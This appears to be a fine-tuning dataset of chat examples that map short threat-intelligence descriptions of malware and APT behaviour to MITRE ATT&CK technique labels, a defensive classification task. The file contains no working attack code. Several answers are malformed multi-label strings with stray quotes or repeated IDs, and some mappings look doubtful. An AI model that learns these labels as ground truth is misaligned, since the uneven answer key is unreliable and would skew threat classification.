- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exfiltrated data over FTP separately from its primary C2 channel over DNS."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used batch scripts and the command-line interface for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don’t have any content with social engineering directing potential victims to click an Enable Content button. It seems that the attackers are depending on the victims to decide entirely on their own whether to click it or not"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can Base64 encode its payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. Machete has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI had a feature to steal data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can upload files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, it drops C:\\Users\\Public\\x.vbs. Then it drops, C:\\Users\\Public\\Natso.bat. Then, it executes `Natso.bat`, which is a \"fileless\" UAC bypass found by James Forshaw. If C:\\Windows\\Finex still doesn't exist (which means the UAC bypass failed), it will update the Nasto.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\\Windows\\Finex` was successfully created. After that, the DLL deletes the dropped file and exits"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use signed loaders to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can enumerate all running processes and process information on an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark has the ability to use `CMD` to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RAR to stage and compress local folders."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can gather victim internal and external IPs."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs, and then terminates the setup procedure with a call to StartService to run the stage 4 malware"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly usually attempts to remain within a targeted organization for long periods of time—often months—in order to steal large volumes of information. It keeps the compromise alive by deploying a number of tools that facilitate communication between the attackers and infected computers"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit supports peer connections."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below: Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6d7be6acf5055831cc961a51d3e921f96bd Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 The payload from each of the malicious documents is an updated version of the BADNEWS malware family"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap uses a Launch Agent to persist."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exfiltration BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1505.003 - Server Software Component: Web Shell', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can delete itself from the compromised computer."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal's version of Bandook adds a registry key to \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QakBot payload has been disguised as a PNG file."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP and HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck abuses NTFS transactions to launch and conceal malicious processes."
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Psylo uses HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Out1 can copy files and Registry data from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects data from the local victim system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy starts a rootkit from a malicious file dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Regin malware platform supports many standard protocols, including HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This sample was delivered by a malicious document named “Interview with a north Korean defector”. The macro embedded inside unpacks and executes winload.exe"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc gathers product names from the Registry key: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName\" and the processor description from the Registry key \"HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can delete downloaded executables after running them."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to obtain a process listing."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has impersonated systems management software to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the extraction, a JSP webshell is deployed on one of the public directories used by the webmail component. The attacker can browse to the webshell to start executing arbitrary commands on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception is continuing to use chains of infected routers to act as proxies and mask communications between the attackers and the cloud service providers they use. Certain router manufacturers have UPnP listening on WAN as a default configuration. These routers are hijacked by Inception and configured to forward traffic from one port to another host on the internet. Abuse of this service requires no custom malware to be injected on the routers and can be used at scale very easily. Inception strings chains of these routers together to create multiple proxies to hide behind"
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All of these files reside in the victim’s %TEMP% directory: Filename Description 9PT568.dat Contains victim unique identifier TPX498.dat Keystroke logs edg499.dat List of interesting files TPX499.dat Temporarily holds screenshot when given command by C2 up Temporarily contains downloaded file to be executed when given command by C2 Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get Directory Information The malware gets information for the provided directory address using the following WINAPI calls:"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The directory is used as temporary storage for files containing collected data about the compromised computer. Such files share a common naming convention, encryption algorithm and structure. They are encrypted by a simple variation of the XOR cipher which is used across the malware components. The type of the file can be derived from the 4-byte control sequences placed at the beginning of the file"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file"
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails', 'T1083 - File and Directory Discovery', 'T1480 - Execution Guardrails', 'T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro in the XLS file uses PowerShell to download and execute gm.exe, which is the Warzone RAT - Gm.exe bypasses UAC to run at high integrity level - Gm.exe copies itself to %programdata% with the name Images.exe and then executes it"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "I download my tools from GitHub, and so do my victims"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery', 'T1135 - Network Share Discovery', 'T1046 - Network Service Discovery', 'T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOMPROGO is capable of creating a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind has a command to return a directory listing for a specified directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Targets common cloud applications such as web servers for initial access, using known vulnerabilities (“1-days”) – presumably those with a working exploit in the wild. Uses Windows container escape techniques to escape the container and gain code execution on the underlying node. Connects to its C2 server using the IRC protocol over the Tor network"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has executed PowerShell commands which were encoded or compressed using Base64, zlib, and XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aside from stealing credentials from applications, it also steals the following information from several popular web browsers such as Google Chrome, Mozilla Firefox, Internet Explorer, and Microsoft Edge"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
